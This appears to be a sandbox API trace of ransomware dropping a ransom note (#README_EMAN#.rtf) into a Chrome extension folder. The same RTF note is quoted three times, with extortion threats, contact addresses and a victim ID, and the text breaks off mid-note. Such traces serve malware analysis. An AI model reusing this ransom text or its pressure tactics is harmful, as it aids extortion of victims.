(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\#readme_eman#.rtf")) returned 0xffffffff [0283.697] GetLastError () returned 0x2 [0283.697] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.698] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.698] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.698] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x235c8a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring 